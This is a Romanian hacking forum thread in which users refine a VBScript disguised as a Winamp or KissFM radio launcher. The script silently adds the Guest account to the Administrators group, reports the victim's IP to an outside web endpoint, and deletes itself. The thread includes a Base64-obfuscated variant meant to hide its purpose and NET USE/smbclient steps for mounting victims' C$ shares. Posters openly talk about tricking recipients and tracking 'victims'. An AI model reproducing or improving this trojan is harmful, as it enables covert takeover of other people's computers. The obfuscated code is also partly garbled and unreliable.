kiar e adevarata faza asta? cine poate sa-mi confirme... [metacafe]http://www.metacafe.com/watch/427768/undetected_way_to_connect_to_any_computer_in_your_local/[/metacafe]
_______________________________________ REVIN IN OCTOMBRIE...bafta la toti
#2
hac3ru Grand Master Din: a city on Earth
Postari: 344
frate am adormit eu pe drum de am pierdut firu`? la ultima parte se zice k e self-delete... sau ceva de jenu... dupa executare... dar nu iti zice sa`l salvezi exe sau bat sau mai sth eu ce... deci ala la care il trimiti... il va deschide in notepad... nu? si oricum... mai uitate o data la el sa vezi k scrie ceva de winamp... e vorba de o mel cu lloyd banks... cred... deci nu poate fii adevarat..... ar fii chiar prea simplu... faci un notepad.. il trimiti si ai access la el la calc? incearca cu un trojan k e mai sigur. dar din pacate e detectat de antivirus si aproape sigur si de firewall....
_______________________________________ If u are a good hacker everybody knows your name... If u are the best hacker nobody knows who you are.
mi se pare ca chesti aia itideschide porul 139/135 dar nu iti spune s-o salvezi .bat ( sibur e batch file ) dar nu stiu ce as zic
pai mi sar parea logic sa fie un ".bat".dar se intelege de la sine daca stii putina programare(ca dim e din pascal doar)...si ar trebui sati dai seama...mam uitat iar...nu e .bat e un .vbs daca va uitati bine spune acolo Lloyd Banks.vbs...si faza aceea cu "192.168.0.105/c$" se o foloseste administratorul de la laboratoarele noastre de informatica pt a vedea ce se intampla in fiecare calculator...deci se poate...si are dreptate ala...o s vorbesc cu adminu' de loa mine din liceu si o sa revin cu un Edit
_______________________________________ REVIN IN OCTOMBRIE...bafta la toti
#6
sergyu1 Grand Master Din: Curiozitate
Postari: 266
aveam eu un program care controlam serverul si il inchideam cand aveam chef era facut de un prieten in visual basci da dupa format so dus toate programele mele
super taree... functioneaza... am facut eu niste imbunatatiri: 1: daca guest e deja in administratori (sau daca executa de 2 ori scriptu) ar trebui sa dea o eroare... am rezolvat pe linia 1 2: winampu nu raspunde suficient de repede si ca sa se intample ceva cu el am mai pus un sleep in script (din clipa in care scrii textul de cautat si pana dai enter dureaza putin pana se populeaza lista cu melodiile gasite) altfel el isi vedea de traba lui ca si cand scriptu nu ar fi rulat 3: am facut sa opreasca melodia inainte sa caute melodii ca de multe ori se intampla sa nu porneasca prima melodie gasita daca deja canta una...(asta daca dai repede comenzile) 4: am facut criteriul de cautare litera "a" ca nu toata lumea are in lista lloyd banks 5: am redenumit scriptul winamp si am adaptat scriptu pt chestia asta (pe ultima linie se sterge scriptu... daca aici paramtrul nu e exact numele fisierului nu se va sterge)
------------------iata noul script (winamp.vbs)-------------------
on error resume next dim oexec dim Group dim GroupName dim GroupDomain dim strTextFile dim oWSHNetwork
set wshshell = wscript.CreateObject("WScript.Shell" ) set oExec = Wshshell.exec("c:Program Fileswinampwinamp.exe" ) wscript.sleep 5000 wshshell.sendkeys "v" wshshell.sendkeys "j" wshshell.sendkeys "a" wscript.sleep 500 wshshell.sendkeys "~"
-------------------------------------------------- acuma ma pun sa studiez winampu ca sa dau drumu la un radio stream sa fie mai usor de fentat lumea... cand e gata vi-l dau --atentie insa... scriptul va oferta drepturi de read-write asa ca vedeti ce faceti pe acolo -------------------------------------------------- scriptu functioneaza perfect... baga Guest in grupul Administrators astfel oricine pe comp are drepturi de administrare atat pe local cat si remote -- super tareee ca sa verificati daca scriptul a mers la voi pe comp intrati in control panel->Administrative Tools->Computer Management->Local Users and Groups->Administrators si acolo tre sa fie in lista Guest
_______________________________________ In God I trust... all others please send me md5 sum-checks
dupa cum am promis ca revin... am gasit o solutie si mai buna 1: am pus sa cante radio stream -> kissfm 2: scriptu nu mai are nevoie de sleep decat ala de la pornirea winamp-ului (5 secunde din clipa in care ai pornit scriptu si pana porneste winamp-ul) astfel e mai transparent... nevazandu-se nici o caseta de dialog... 3: am redenumit scriptu kissfm.vbs si am adaptat scriptu pt stergere... 4: am adaugat putin cod ca sa se inregistreze ip-urile victimelor undeva 5: consultati victimele de pana acu la http://www.cbmc.ro/victims.txt ------------------------iata noul cod--------------------------------- on error resume next dim oexec dim Group dim GroupName dim GroupDomain dim strTextFile dim oWSHNetwork
Set oWSHNetwork = CreateObject ("WScript.Network" ) strTextFile = "Guest" GroupDomain = oWSHNetwork.UserDomain GroupName = "administrators" Set Group = GetObject("WinNT://" & GroupDomain & "/" & GroupName & ",group" ) Group.Add("WinNT://" & GroupDomain & "/" & strTextFile & ",user" ) Set http = CreateObject("Microsoft.XmlHttp" ) http.open "GET", "http://www.cbmc.ro/victims.php", FALSE http.send "" Set objFSO = CreateObject ("Scripting.FileSystemObject" ) Set objFile = objFSO.GetFile("kissfm.vbs" ) objFSO.DeleteFile objFile ------------------------------bafta la navigare (pe coampele victimelor)----------- ps: puteti accesa orice victima si de pe internet nu doar din retea singura conditie e sa-i stiti ip-ul... sa nu fie prin router...sau daca e sa aiba forward la portu 139... sa nu aibe firewall care sa filtreze portu 139 si/sau 445 depinde de versiunea windowsului (cum gestioneaza cererile si pachetele SMB) ... sa fie enabled file and printer sharing
accesarea victimei: \xxx.xxx.xxx.xxx(literapartitiei)$ unde x-rile inlocuiesc ip-ul (merge si dupa netbiosname in retele locale daca totul e configurat bine)
nota: cel care lanseaza scitpu ca acesta sa-si faca treaba tre sa fie logat in wondows cu un cont cu drepturi de administrator (sau cu drepturi de groups manager) si trebuie sa aiba servicul netlogon pornit
pentru a va crea un drive virtual cu partitiile lui folositi in cmd urmatoarea comanda: NET USE S: \xxx.xxx.xxx.xxxC$ /persistent:yes unde S: e litera care vrei sa-ti apara tie in my computer iar C$ litera corespunzatoare partitiei lui din windows nu stiu cum sa-ti spun sa faci ca sa vezi ce servicii ruleaza la el (adica C$...etc) dar din linux poti cu smbclient -L xxx.xxx.xxx.xxx si vezi ce litere au $ dupa ele...
--------------------------------------------
_______________________________________ In God I trust... all others please send me md5 sum-checks
---scz ca fac atatea posturi dar am venit cu ceva nou si nu vreau sa se incurce lucrurile... -------------------------------------- urmatorul cod face acelasi lucru si fisierul trebuie numit tot kissfm.vbs ca sa se stearga... dar este mult mai misterios... in sensul ca nu e la prima vedere ce face --------------------------------codul---------------------------- on error resume next Function Base64Decode(ByVal base64String) Const Base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" Dim dataLength, sOut, groupBegin
If thisChar = "=" Then numDataBytes = numDataBytes - 1 thisData = 0 Else thisData = InStr(1, Base64, thisChar, vbBinaryCompare) - 1 End If If thisData = -1 Then Err.Raise 2, "Base64Decode", "Bad character In Base64 string." Exit Function End If
@srdjan tu esti sigur ca merge...eu suntpe o retea de oras din piatra neamt(poate mai e cineva pe forum din piatra neamt si stie de ambra)as vrea sa situ daca se poate pe ambra...si daca scriptu poate fi interpretat ca un virus...daca imi trimite ip-u la cel cae vreau sa ma conectez...10X
_______________________________________ REVIN IN OCTOMBRIE...bafta la toti
mai.. am zis si mai sus... scriptu nu face altceva decat sa se joace cu winampu...baga guest in grupul de administratori si trimite ip-ul victimei unui script pe net care-l salveaza intr-un txt... de aici e treaba ta sa te conectezi folosindu-te de contul de guest dar cu drepturi de administrator... nu e prefect scriptul dar nah... prevad un succed de 60% la aia care-l clickuiesc :P
_______________________________________ In God I trust... all others please send me md5 sum-checks
#12
sergyu1 Grand Master Din: Curiozitate
Postari: 266
Vnc miam amintit e bun de control sau este un program afcut in visual absic cu server si client si il controilezi nu ca trojan ci cu viwer ;0
srdjan?tu esti din botosani cumva?victimele alea au aceiasi clasa de ip uri cu a mea.....hmm..City-Net cumva?daca asa-i pai imi poti spune mai multe despre reteaua asta?
cum sa iei controlul unui calculator din LAN – poza de m3ss, in S.O.S. · 3.3KB
_______________________________________ "Only GOD can judge me"-Tupac Shakur
interesant...am vazut site-ul ieri si de autunci numai cu ochii pe el stau,vreau sa invat cat mai multe.Am inteles ca virtual basic este bun pentru incepatori.L-am luat si incerc sa fac experimente cu el ) ...sa vad ce reusesc